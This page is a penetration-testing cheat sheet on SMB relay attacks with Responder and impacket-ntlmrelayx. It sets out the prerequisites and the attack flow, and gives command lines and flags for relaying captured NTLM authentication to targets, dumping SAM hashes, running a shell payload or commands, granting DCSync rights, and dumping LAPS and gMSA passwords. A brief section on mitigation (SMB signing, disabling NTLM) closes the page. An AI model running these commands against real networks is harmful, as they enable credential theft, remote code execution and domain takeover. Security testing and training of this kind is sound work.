smb relay ntlmrelayx
REQUIREMENTS:
SMB signing must be disabled.
Relayed user creds must be admin on machine
Information
Invoke this attack: request callback to SMB on kali using \\IP
responderwill capture the request, pass it tontlmrelayxntlmrelayx will relay the request to TARGET.txt
Enables RemoteRegistry
Captures system bootkey
Performs intended action; Default action: SAM dump using
secretsdump.pyRetores RemoteRegistry back to disabled state.
impacket-ntlmrelayx [-6] [-t TARGET | -tf TARGET_FILE] -smb2support [-l LOOT_DIR] [-i] [-e "SHELL.exe"] [-c "COMMANDS"]
--escalate-user USER: will escalate to add ACL Replication-Get-Changes-All for USER on DC (DCSync)
# -6: IPv6
# -i: will open a smb shell, can connect using nc IP PORT
# --dump-laps: dump LAPS passwords
# --dump-gmsa: dump gMSA passwordsSMB-check
nmap --script=smb2-security-mode.nse -p 445 IP/CIDRMethod:
set
SMB=OffandHTTP=Offin/etc/responder/Responder.confRun
sudo responder -I INTF -rdwvRun
ntlmrelayx.py -tf TARGET.txt -smb2support [FLAGS]
Fix
Enable SMB signing on all devices (can cause performance issues).
Disable NTLM Auth on network
Account tiering (restricting domain admins to specific tasks)
Last updated
Was this helpful?